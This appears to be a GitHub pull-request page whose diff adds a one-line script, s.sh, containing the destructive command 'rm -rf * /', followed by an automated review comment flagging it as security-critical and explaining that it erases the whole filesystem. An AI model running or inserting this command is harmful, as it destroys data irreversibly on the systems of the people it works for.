Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions s.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
rm -rf * /
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

security-critical critical

This command is extremely dangerous and will destroy the system it is run on. rm -rf * / will first delete all files and directories in the current path, and then it will proceed to recursively and forcefully delete the entire root directory (/). This will result in complete and irreversible data loss. This line must be removed.